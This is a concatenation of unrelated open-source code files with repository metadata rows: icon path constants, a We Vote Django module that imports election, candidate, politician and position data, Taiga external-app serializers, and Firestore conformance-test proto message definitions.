WWW_ICON = os.path.join(ICONS_PATH, "www.png")
PROCESS_ICON = os.path.join(ICONS_PATH, "process.png")
# For the Feedback form
MAIL_DEFAULT_ICON = os.path.join(ICONS_PATH, "maildefault.png")
MAIL_GMAIL_ICON = os.path.join(ICONS_PATH, "mailgoogle.png")
MAIL_OTHER_ICON = os.path.join(ICONS_PATH, "mailother.png")
CHECKED_ICON = os.path.join(ICONS_PATH, "check.ico")
UNCHECKED_ICON = os.path.join(ICONS_PATH, "uncheck.ico")
RADIOCHECKED_ICON = os.path.join(ICONS_PATH, "radiocheck.ico")
RADIOUNCHECKED_ICON = os.path.join(ICONS_PATH, "radiouncheck.ico")
| gpl-3.0 | 8,382,389,665,049,526,000 | 46.444444 | 67 | 0.639344 | false |
wevoteeducation/WeVoteBase | import_export/models.py | 1 | 38189 | # import_export/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.contrib import messages
from election_office_measure.models import Election, ContestOffice, CandidateCampaign, CandidateCampaignManager, \
BallotItem
from exception.models import handle_exception, handle_record_not_found_exception, \
handle_record_not_saved_exception
from import_export_google_civic.models import GoogleCivicBallotItem, GoogleCivicBallotItemManager, \
GoogleCivicElection, GoogleCivicContestOffice
from import_export_theunitedstatesio.models import TheUnitedStatesIoLegislatorCurrent
import json
from organization.models import Organization, OrganizationManager
from politician.models import Politician
from position.models import PositionEntered
import requests
from wevotebase.base import get_environment_variable
import wevote_functions.admin
from wevote_functions.models import value_exists
logger = wevote_functions.admin.get_logger(__name__)
def transfer_theunitedstatesio_cached_data_to_wevote_tables():
"""
In this method, we take the cached theunitedstatesio data and move it into the core We Vote data
:return:
"""
logger.info("Running transfer_theunitedstatesio_cached_data_to_wevote_tables()")
legislators_current_query = TheUnitedStatesIoLegislatorCurrent.objects.all()
# Only retrieve entries that haven't been processed yet
# legislators_current_query = legislators_current_query.filter(was_processed=False)
for legislator_current_entry in legislators_current_query:
logger.info(u"Transferring {id}: {first_name} {last_name}".format(
id=str(legislator_current_entry.id),
first_name=legislator_current_entry.first_name,
last_name=legislator_current_entry.last_name
))
politician_entry_found = False
#########################
# Search the Politician's table to see if we already have an entry for this person
# Do we have a record of this politician based on id_bioguide?
if legislator_current_entry.bioguide_id != "":
try:
# Try to find earlier version based on the bioguide identifier
query1 = Politician.objects.all()
query1 = query1.filter(id_bioguide__exact=legislator_current_entry.bioguide_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
politician_entry_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on bioguide id
# ...so check to see if we have a record of this legislator based on govtrack id?
if legislator_current_entry.govtrack_id != "":
try:
query1 = Politician.objects.all()
query1 = query1.filter(id_govtrack__exact=legislator_current_entry.govtrack_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on id_govtrack
# ...so check to see if we have a record of this legislator based on full_name_google_civic
if legislator_current_entry.first_name and legislator_current_entry.last_name:
try:
full_name_assembled_guess = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
logger.info(u"Searching for existing full_name_google_civic: {full_name_assembled}".format(
full_name_assembled=full_name_assembled_guess
))
query1 = Politician.objects.all()
query1 = query1.filter(full_name_google_civic=full_name_assembled_guess)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on full_name_google_civic
# ...so check to see if we have a record of this legislator based on full_name_assembled
if legislator_current_entry.first_name and legislator_current_entry.last_name:
try:
full_name_assembled_guess = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
logger.info("Searching for existing full_name_assembled: {full_name_assembled}".format(
full_name_assembled=full_name_assembled_guess
))
query1 = Politician.objects.all()
query1 = query1.filter(full_name_assembled=full_name_assembled_guess)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found
# ...so create a new entry
politician_entry = Politician(
last_name=legislator_current_entry.last_name,
first_name=legislator_current_entry.first_name,
full_name_assembled=legislator_current_entry.first_name+" "+legislator_current_entry.last_name,
)
politician_entry.last_name = legislator_current_entry.last_name
politician_entry.first_name = legislator_current_entry.first_name
politician_entry.full_name_assembled = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
politician_entry.birth_date = legislator_current_entry.birthday
politician_entry.gender = legislator_current_entry.gender
politician_entry.id_bioguide = legislator_current_entry.bioguide_id
politician_entry.id_thomas = legislator_current_entry.thomas_id
politician_entry.id_opensecrets = legislator_current_entry.opensecrets_id
politician_entry.id_lis = legislator_current_entry.lis_id
politician_entry.id_cspan = legislator_current_entry.cspan_id
politician_entry.id_govtrack = legislator_current_entry.govtrack_id
politician_entry.id_votesmart = legislator_current_entry.votesmart_id
politician_entry.id_ballotpedia = legislator_current_entry.ballotpedia_id
politician_entry.id_washington_post = legislator_current_entry.washington_post_id
politician_entry.id_icpsr = legislator_current_entry.icpsr_id
politician_entry.id_wikipedia = legislator_current_entry.wikipedia_id
# OTHER FIELDS
# "type", # row[4]
politician_entry.state_code = legislator_current_entry.state # "state", # row[5]
# "district", # row[6]
politician_entry.party = legislator_current_entry.party # "party", # row[7]
# "url", # row[8]
# "address", # row[9]
# "phone", # row[10]
# "contact_form", # row[11]
# "rss_url", # row[12]
# "twitter", # row[13]
# "facebook", # row[14]
# "facebook_id", # row[15]
# "youtube", # row[16]
# "youtube_id", # row[17]
# We use "try/exception" so we know when entry isn't saved due to unique requirement
# This works! Bigger question -- how to deal with exceptions in general?
try:
politician_entry.save()
# Mark the source entry as was_processed so we don't try to import the same data again
# legislator_current_entry.save()
except Exception as e:
handle_exception(e, logger=logger)
def google_civic_save_election():
# Bring in the GoogleCivicElection and save the Election
google_civic_query1 = GoogleCivicElection.objects.all()
# Only retrieve entries that haven't been processed yet
# google_civic_query1 = google_civic_query1.filter(was_processed=False)
for google_civic_election_entry in google_civic_query1:
election_exists_locally = False
#########################
# Search the Election table to see if we already have an entry for this election
if google_civic_election_entry.google_civic_election_id != "":
try:
# Try to find earlier version based on the google_civic_election_id identifier
query1 = Election.objects.all()
query1 = query1.filter(
google_civic_election_id__exact=google_civic_election_entry.google_civic_election_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
election_entry = query1[0]
election_exists_locally = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
continue
try:
if election_exists_locally:
# Update the values
election_entry.google_civic_election_id = google_civic_election_entry.google_civic_election_id
            election_entry.name = google_civic_election_entry.name
election_entry.election_date_text = google_civic_election_entry.election_day
else:
# An entry in the local Election was not found based on google_civic_election_id
# ...so create a new entry
election_entry = Election(
google_civic_election_id=google_civic_election_entry.google_civic_election_id,
name=google_civic_election_entry.name,
election_date_text=google_civic_election_entry.election_day,
)
election_entry.save()
# Mark the source entry as was_processed so we don't try to import the same data again
# google_civic_election_entry.was_processed = True
# Save the local we vote id back to the imported google civic data for cross-checking
google_civic_election_entry.we_vote_election_id = election_entry.id
google_civic_election_entry.save()
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
continue
# END OF google_civic_save_election
def google_civic_get_or_create_contest_office(google_civic_candidate_campaign_entry, election_on_stage):
error_result = False
ballot_item_on_stage = BallotItem()
ballot_item_on_stage_found = False
google_civic_ballot_item_on_stage = GoogleCivicBallotItem()
contest_office_on_stage = ContestOffice()
contest_office_created = False
google_civic_contest_office_on_stage = GoogleCivicContestOffice()
try:
# When we import from google, we link a google_civic_contest_office entry (with an internal id) to
# google_civic_candidate_campaign_entry
logger.debug("Retrieving google_civic_contest_office")
google_civic_contest_office_query = GoogleCivicContestOffice.objects.all()
google_civic_contest_office_query = google_civic_contest_office_query.filter(
id=google_civic_candidate_campaign_entry.google_civic_contest_office_id)
if len(google_civic_contest_office_query) == 1:
google_civic_contest_office_on_stage = google_civic_contest_office_query[0]
else:
logger.error("Single google_civic_contest_office NOT found")
return {
'error_result': True,
}
# Try to find earlier version based on the google_civic_election_id identifier
logger.debug("Retrieving contest_office")
contest_office_query = ContestOffice.objects.all()
contest_office_query = contest_office_query.filter(
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id)
contest_office_query = contest_office_query.filter(
district_name=google_civic_contest_office_on_stage.district_name)
contest_office_query = contest_office_query.filter(office_name=google_civic_contest_office_on_stage.office)
# TODO: If the 'office' text from Google Civic changes slightly, we would create a new ContestOffice entry
# (which would not be correct) Should we make this more robust and error-proof?
# Was at least one existing entry found based on the above criteria?
if len(contest_office_query):
contest_office_on_stage = contest_office_query[0]
contest_office_created = False
# TODO Update contest_office information here
elif len(contest_office_query) > 1:
# We have bad data - a duplicate
logger.error(u"We have bad data, a duplicate ContestOffice entry: {office}".format(
office=google_civic_contest_office_on_stage.office
))
return {
'error_result': True,
}
else:
# Create a new ContestOffice entry
logger.debug("Creating contest_office")
contest_office_on_stage = ContestOffice(
office_name=google_civic_contest_office_on_stage.office,
election_id=election_on_stage.id,
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id,
number_voting_for=google_civic_contest_office_on_stage.number_voting_for,
number_elected=google_civic_contest_office_on_stage.number_elected,
primary_party=google_civic_contest_office_on_stage.primary_party,
district_name=google_civic_contest_office_on_stage.district_name,
district_scope=google_civic_contest_office_on_stage.district_scope,
district_ocd_id=google_civic_contest_office_on_stage.district_ocd_id,
)
contest_office_on_stage.save()
contest_office_created = True
google_civic_contest_office_on_stage.we_vote_election_id = election_on_stage.id
google_civic_contest_office_on_stage.we_vote_contest_office_id = contest_office_on_stage.id
google_civic_contest_office_on_stage.save()
# Save the ballot_placement
# Try to find earlier version based on the google_civic_election_id identifier
logger.debug("Retrieving BallotItem")
ballot_item_query = BallotItem.objects.all()
ballot_item_query = ballot_item_query.filter(voter_id=1)
ballot_item_query = ballot_item_query.filter(
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id)
ballot_item_query = ballot_item_query.filter(contest_office_id=contest_office_on_stage.id)
if len(ballot_item_query) == 1:
ballot_item_on_stage = ballot_item_query[0]
ballot_item_on_stage_found = True
except Exception as e:
error_result = True
handle_record_not_found_exception(e, logger=logger)
try:
voter_id = 1
if value_exists(google_civic_contest_office_on_stage.ballot_placement):
# If the ballot order is specified by Google, use that.
local_ballot_order = google_civic_contest_office_on_stage.ballot_placement
else:
            # Pull the ballot order from the cached Google Civic ballot item for this voter and district
google_civic_ballot_item_manager = GoogleCivicBallotItemManager()
local_ballot_order = google_civic_ballot_item_manager.fetch_ballot_order(
voter_id, google_civic_contest_office_on_stage.google_civic_election_id,
google_civic_contest_office_on_stage.district_ocd_id)
if ballot_item_on_stage_found:
# Update the values
ballot_item_on_stage.election_id = election_on_stage.id
# TODO Add all values here
else:
logger.debug("Creating BallotItem")
ballot_item_on_stage = BallotItem(
voter_id=voter_id,
election_id=election_on_stage.id,
google_civic_election_id=google_civic_contest_office_on_stage.google_civic_election_id,
contest_office_id=contest_office_on_stage.id,
# contest_measure_id: Used for measures/referendum/initiatives
ballot_order=local_ballot_order,
ballot_item_label=google_civic_contest_office_on_stage.office,
)
ballot_item_on_stage.save()
except Exception as e:
error_result = True
handle_record_not_saved_exception(e, logger=logger)
results = {
'error_result': error_result,
'contest_office_on_stage': contest_office_on_stage,
'contest_office_created': contest_office_created,
}
return results
# END OF google_civic_get_or_create_contest_office
def google_civic_get_or_create_candidate_campaign_basic(google_civic_candidate_campaign_entry):
"""
    Search the CandidateCampaign table to see if we already have an entry for this candidate in this election
:param google_civic_candidate_campaign_entry:
:return:
"""
error_result = False
candidate_campaign_exists_locally = False
candidate_campaign_on_stage = CandidateCampaign()
candidate_campaign_created = False
politician_link_needed = True
try:
# Try to find earlier version based on the google_civic_election_id identifier
candidate_campaign_query = CandidateCampaign.objects.all()
candidate_campaign_query = candidate_campaign_query.filter(
google_civic_election_id__exact=google_civic_candidate_campaign_entry.google_civic_election_id)
# TODO: If the name from Google Civic changes slightly, we would create a new campaign entry
# (which would not be correct) We should make this more robust and error-proof
candidate_campaign_query = candidate_campaign_query.filter(
candidate_name__exact=google_civic_candidate_campaign_entry.name)
# Was at least one existing entry found based on the above criteria?
if len(candidate_campaign_query):
candidate_campaign_on_stage = candidate_campaign_query[0]
candidate_campaign_exists_locally = True
# Is a Politician linked to this candidate_campaign_on_stage
if candidate_campaign_on_stage.politician_id:
politician_link_needed = False
except Exception as e:
error_result = True
handle_record_not_found_exception(e, logger=logger)
if not candidate_campaign_exists_locally:
# An entry in the local CandidateCampaign table was not found
# ...so create a new entry
try:
candidate_campaign_on_stage = CandidateCampaign(
google_civic_election_id=google_civic_candidate_campaign_entry.google_civic_election_id,
candidate_name=google_civic_candidate_campaign_entry.name,
party=google_civic_candidate_campaign_entry.party,
)
candidate_campaign_on_stage.save()
candidate_campaign_created = True
except Exception as e:
error_result = True
handle_record_not_saved_exception(e, logger=logger)
results = {
'error_result': error_result,
'politician_link_needed': politician_link_needed,
'candidate_campaign_created': candidate_campaign_created,
'candidate_campaign_on_stage': candidate_campaign_on_stage,
}
return results
# END OF google_civic_get_or_create_candidate_campaign_basic
def google_civic_get_or_create_politician(google_civic_candidate_campaign_entry):
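    # Find (or create) the Politician matching this Google Civic candidate,
    # trying full_name_google_civic, then full_name_assembled, then a
    # first/last name guess split from the candidate's name.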
error_result = False
##########################
# Does this politician exist locally?
politician_on_stage = Politician()
politician_on_stage_found = False
first_name_guess = google_civic_candidate_campaign_entry.name.partition(' ')[0]
last_name_guess = google_civic_candidate_campaign_entry.name.partition(' ')[-1]
try:
logger.debug("We are searching based on full_name_google_civic")
query1 = Politician.objects.all()
query1 = query1.filter(full_name_google_civic=google_civic_candidate_campaign_entry.name)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_on_stage = query1[0]
politician_on_stage_found = True
if len(query1) > 1:
# We have confusion, so skip processing this google_civic_candidate_campaign_entry
logger.warn("More than one Politician found (query1)")
else:
logger.warn(u"No politician found based on full_name_google_civic: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_on_stage_found:
# No entries were found, so we need to
# a) Search more deeply
# Searching based on full_name_assembled
logger.info(u"Searching against full_name_assembled: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
# TODO DALE 2015-05-02 With this code, if we had imported a "Betty T. Yee" from another non-google-civic
# source (where full_name_google_civic was empty), we would create a second Politician entry. Fix this.
try:
politician_query_full_name_assembled = Politician.objects.all()
politician_query_full_name_assembled = politician_query_full_name_assembled.filter(
full_name_assembled=google_civic_candidate_campaign_entry.name)
if len(politician_query_full_name_assembled):
politician_on_stage = politician_query_full_name_assembled[0]
politician_on_stage_found = True
else:
logger.warn(u"No politician found based on full_name_assembled: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_on_stage_found:
# No entries were found, so we need to
# a) Search more deeply
logger.info(u"first_name_guess: {first_name_guess}, last_name_guess: {last_name_guess}".format(
first_name_guess=first_name_guess,
last_name_guess=last_name_guess
))
# TODO DALE 2015-05-02 With this code, if we had imported a "Betty T. Yee" from another non-google-civic
# source (where full_name_google_civic was empty), we would create a second Politician entry. Fix this.
try:
politician_query_first_last_guess = Politician.objects.all()
politician_query_first_last_guess = politician_query_first_last_guess.filter(first_name=first_name_guess)
politician_query_first_last_guess = politician_query_first_last_guess.filter(last_name=last_name_guess)
if len(politician_query_first_last_guess):
politician_on_stage = politician_query_first_last_guess[0]
politician_on_stage_found = True
else:
logger.warn(
"No politician found based on first_name_guess: {first_name} "\
"and last_name_guess: {last_name}".format(
first_name=first_name_guess,
last_name=last_name_guess
)
)
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if politician_on_stage_found:
# We found a match, and want to update the Politician data to match how Google Civic references the name
logger.debug("Store google_civic_candidate_campaign_entry.name in Politician.full_name_google_civic")
politician_on_stage.full_name_google_civic = google_civic_candidate_campaign_entry.name
else:
logger.debug("Create Politician entry: {name}".format(
name=google_civic_candidate_campaign_entry.name
))
politician_on_stage = Politician(
# Do not save first_name or last_name because middle initials will throw this off
last_name=last_name_guess,
first_name=first_name_guess,
full_name_google_civic=google_civic_candidate_campaign_entry.name,
)
politician_on_stage.save()
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
if error_result:
logger.error("There was an error trying to create a politician")
else:
logger.debug("It seems we have found a politician: {display_full_name}".format(
display_full_name=politician_on_stage.display_full_name()
))
results = {
'error_result': error_result,
'politician_on_stage': politician_on_stage,
}
return results
WE_VOTE_API_KEY = get_environment_variable("WE_VOTE_API_KEY")
ORGANIZATIONS_URL = get_environment_variable("ORGANIZATIONS_URL")
ORGANIZATIONS_JSON_FILE = get_environment_variable("ORGANIZATIONS_JSON_FILE")
CANDIDATE_CAMPAIGNS_URL = get_environment_variable("CANDIDATE_CAMPAIGNS_URL")
CANDIDATE_CAMPAIGNS_JSON_FILE = get_environment_variable("CANDIDATE_CAMPAIGNS_JSON_FILE")
POSITIONS_URL = get_environment_variable("POSITIONS_URL")
POSITIONS_JSON_FILE = get_environment_variable("POSITIONS_JSON_FILE")
# TODO DALE Get this working
def import_we_vote_organizations_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
logger.info("Loading Organizations from We Vote Master servers")
request = requests.get(ORGANIZATIONS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
logger.info("Loading organizations from local file")
with open(ORGANIZATIONS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_organization in structured_json:
logger.debug(
u"id_we_vote: {id_we_vote}, name: {name}, url: {url}".format(**one_organization)
)
# Make sure we have the minimum required variables
if len(one_organization["id_we_vote"]) == 0 or len(one_organization["name"]) == 0:
continue
# Check to see if this organization is already being used anywhere
organization_on_stage_found = False
try:
if len(one_organization["id_we_vote"]) > 0:
organization_query = Organization.objects.filter(id_we_vote=one_organization["id_we_vote"])
if len(organization_query):
organization_on_stage = organization_query[0]
organization_on_stage_found = True
elif len(one_organization["name"]) > 0:
organization_query = Organization.objects.filter(name=one_organization["name"])
if len(organization_query):
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if organization_on_stage_found:
# Update
organization_on_stage.id_we_vote = one_organization["id_we_vote"]
organization_on_stage.name = one_organization["name"]
organization_on_stage.url = one_organization["url"]
organization_on_stage.save()
messages.add_message(request, messages.INFO, u"Organization updated: {name}".format(
name=one_organization["name"]))
else:
# Create new
organization_on_stage = Organization(
id_we_vote=one_organization["id_we_vote"],
name=one_organization["name"],
url=one_organization["url"],
)
organization_on_stage.save()
messages.add_message(request, messages.INFO, u"New organization imported: {name}".format(
name=one_organization["name"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(
request, messages.ERROR,
u"Could not save Organization, id_we_vote: {id_we_vote}, name: {name}, url: {url}".format(
id_we_vote=one_organization["id_we_vote"],
name=one_organization["name"],
url=one_organization["url"],))
def import_we_vote_candidate_campaigns_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading CandidateCampaign IDs from We Vote Master servers")
request = requests.get(CANDIDATE_CAMPAIGNS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
messages.add_message(request, messages.INFO, "Loading CandidateCampaigns IDs from local file")
with open(CANDIDATE_CAMPAIGNS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_candidate_campaign in structured_json:
# For now we are only adding a We Vote ID so we can save Positions
candidate_campaign_on_stage_found = False
try:
if len(one_candidate_campaign["candidate_name"]) > 0:
candidate_campaign_query = CandidateCampaign.objects.filter(
candidate_name=one_candidate_campaign["candidate_name"])
if len(candidate_campaign_query) == 1: # Make sure only one found
candidate_campaign_on_stage = candidate_campaign_query[0]
candidate_campaign_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if candidate_campaign_on_stage_found:
# Update
candidate_campaign_on_stage.id_we_vote = one_candidate_campaign["id_we_vote"]
candidate_campaign_on_stage.save()
messages.add_message(request, messages.INFO, u"CandidateCampaign updated: {candidate_name}".format(
candidate_name=one_candidate_campaign["candidate_name"]))
else:
messages.add_message(request, messages.ERROR, u"CandidateCampaign not found: {candidate_name}".format(
candidate_name=one_candidate_campaign["candidate_name"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
u"Could not save CandidateCampaign, id_we_vote: {id_we_vote}, "
u"candidate_name: {candidate_name}, ".format(
id_we_vote=one_candidate_campaign["id_we_vote"],
candidate_name=one_candidate_campaign["candidate_name"],))
def import_we_vote_positions_from_json(request, load_from_uri=False):
"""
Get the json data, and either create new entries or update existing
:return:
"""
if load_from_uri:
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading positions from We Vote Master servers")
request = requests.get(POSITIONS_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
})
structured_json = json.loads(request.text)
else:
# Load saved json from local file
messages.add_message(request, messages.INFO, "Loading positions from local file")
with open(POSITIONS_JSON_FILE) as json_data:
structured_json = json.load(json_data)
for one_position in structured_json:
# Make sure we have the minimum required variables
if len(one_position["id_we_vote"]) == 0 \
or len(one_position["organization_id_we_vote"]) == 0\
or len(one_position["candidate_campaign_id_we_vote"]) == 0:
continue
# Check to see if this position is already being used anywhere
position_on_stage_found = False
try:
if len(one_position["id_we_vote"]) > 0:
position_query = PositionEntered.objects.filter(id_we_vote=one_position["id_we_vote"])
if len(position_query):
position_on_stage = position_query[0]
position_on_stage_found = True
        except PositionEntered.DoesNotExist:
pass
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# We need to look up the local organization_id based on the newly saved we_vote_id
organization_manager = OrganizationManager()
organization_id = organization_manager.fetch_organization_id(one_position["organization_id_we_vote"])
# We need to look up the local candidate_campaign_id
candidate_campaign_manager = CandidateCampaignManager()
candidate_campaign_id = candidate_campaign_manager.fetch_candidate_campaign_id_from_id_we_vote(
one_position["candidate_campaign_id_we_vote"])
# TODO We need to look up measure_campaign_id
measure_campaign_id = 0
try:
if position_on_stage_found:
# Update
position_on_stage.id_we_vote = one_position["id_we_vote"]
position_on_stage.organization_id = organization_id
position_on_stage.candidate_campaign_id = candidate_campaign_id
position_on_stage.measure_campaign_id = measure_campaign_id
position_on_stage.date_entered = one_position["date_entered"]
position_on_stage.election_id = one_position["election_id"]
position_on_stage.stance = one_position["stance"]
position_on_stage.more_info_url = one_position["more_info_url"]
position_on_stage.statement_text = one_position["statement_text"]
position_on_stage.statement_html = one_position["statement_html"]
position_on_stage.save()
messages.add_message(request, messages.INFO, u"Position updated: {id_we_vote}".format(
id_we_vote=one_position["id_we_vote"]))
else:
# Create new
position_on_stage = PositionEntered(
id_we_vote=one_position["id_we_vote"],
organization_id=organization_id,
candidate_campaign_id=candidate_campaign_id,
measure_campaign_id=measure_campaign_id,
date_entered=one_position["date_entered"],
election_id=one_position["election_id"],
stance=one_position["stance"],
more_info_url=one_position["more_info_url"],
statement_text=one_position["statement_text"],
statement_html=one_position["statement_html"],
)
position_on_stage.save()
messages.add_message(request, messages.INFO, u"New position imported: {id_we_vote}".format(
id_we_vote=one_position["id_we_vote"]))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
u"Could not save position, id_we_vote: {id_we_vote}, "
u"organization_id_we_vote: {organization_id_we_vote}, "
u"candidate_campaign_id_we_vote: {candidate_campaign_id_we_vote}".format(
id_we_vote=one_position["id_we_vote"],
organization_id_we_vote=one_position["organization_id_we_vote"],
candidate_campaign_id_we_vote=one_position["candidate_campaign_id_we_vote"],
))
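# Hedged example: the import views above all repeat the same "load from the We
# Vote servers or from a local file" step. A helper along these lines could
# centralize that step; it is an illustrative sketch only (not part of the
# original module) and reuses names already referenced above (messages,
# requests, json, WE_VOTE_API_KEY).
def _load_structured_json_example(request, url, local_json_file, load_from_uri=False):
    """Illustrative only: return parsed JSON from the We Vote servers or a local file."""
    if load_from_uri:
        messages.add_message(request, messages.INFO, "Loading data from We Vote Master servers")
        response = requests.get(url, params={
            "key": WE_VOTE_API_KEY,  # This comes from an environment variable
        })
        return json.loads(response.text)
    messages.add_message(request, messages.INFO, "Loading data from local file")
    with open(local_json_file) as json_data:
        return json.load(json_data)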
| mit | -4,914,318,572,167,736,000 | 49.581457 | 118 | 0.620152 | false |
bdang2012/taiga-back-casting | taiga/external_apps/serializers.py | 1 | 2126 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
from taiga.base.api import serializers
from . import models
from . import services
from django.utils.translation import ugettext as _
class ApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = models.Application
fields = ("id", "name", "web", "description", "icon_url")
class ApplicationTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
application = ApplicationSerializer(read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("user", "id", "application", "auth_code", "next_url")
class AuthorizationCodeSerializer(serializers.ModelSerializer):
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("auth_code", "state", "next_url")
class AccessTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("cyphered_token", )
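# Hedged example: a minimal usage sketch for the serializers above; it assumes an
# existing ApplicationToken instance is passed in and is not part of the original
# module.
def _example_serialize_application_token(token):
    """Illustrative only: return the plain dict representation of a token."""
    return ApplicationTokenSerializer(token).data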
| agpl-3.0 | -6,451,691,023,716,321,000 | 36.928571 | 83 | 0.733992 | false |
googleapis/python-firestore | tests/unit/v1/conformance_tests.py | 1 | 14551 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.firestore_v1.types import common
from google.cloud.firestore_v1.types import document
from google.cloud.firestore_v1.types import firestore
from google.cloud.firestore_v1.types import query as gcf_query
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
__protobuf__ = proto.module(
package="tests.unit.v1",
manifest={
"TestFile",
"Test",
"GetTest",
"CreateTest",
"SetTest",
"UpdateTest",
"UpdatePathsTest",
"DeleteTest",
"SetOption",
"QueryTest",
"Clause",
"Select",
"Where",
"OrderBy",
"Cursor_",
"DocSnapshot",
"FieldPath",
"ListenTest",
"Snapshot",
"DocChange",
},
)
class TestFile(proto.Message):
r"""A collection of tests.
Attributes:
tests (Sequence[google.cloud.firestore_v1.types.Test]):
"""
tests = proto.RepeatedField(proto.MESSAGE, number=1, message="Test",)
class Test(proto.Message):
r"""A Test describes a single client method call and its expected
result.
Attributes:
description (str):
short description of the test
comment (str):
a comment describing the behavior being
tested
get (google.cloud.firestore_v1.types.GetTest):
create (google.cloud.firestore_v1.types.CreateTest):
set_ (google.cloud.firestore_v1.types.SetTest):
update (google.cloud.firestore_v1.types.UpdateTest):
update_paths (google.cloud.firestore_v1.types.UpdatePathsTest):
delete (google.cloud.firestore_v1.types.DeleteTest):
query (google.cloud.firestore_v1.types.QueryTest):
listen (google.cloud.firestore_v1.types.ListenTest):
"""
description = proto.Field(proto.STRING, number=1)
comment = proto.Field(proto.STRING, number=10)
get = proto.Field(proto.MESSAGE, number=2, oneof="test", message="GetTest",)
create = proto.Field(proto.MESSAGE, number=3, oneof="test", message="CreateTest",)
set_ = proto.Field(proto.MESSAGE, number=4, oneof="test", message="SetTest",)
update = proto.Field(proto.MESSAGE, number=5, oneof="test", message="UpdateTest",)
update_paths = proto.Field(
proto.MESSAGE, number=6, oneof="test", message="UpdatePathsTest",
)
delete = proto.Field(proto.MESSAGE, number=7, oneof="test", message="DeleteTest",)
query = proto.Field(proto.MESSAGE, number=8, oneof="test", message="QueryTest",)
listen = proto.Field(proto.MESSAGE, number=9, oneof="test", message="ListenTest",)
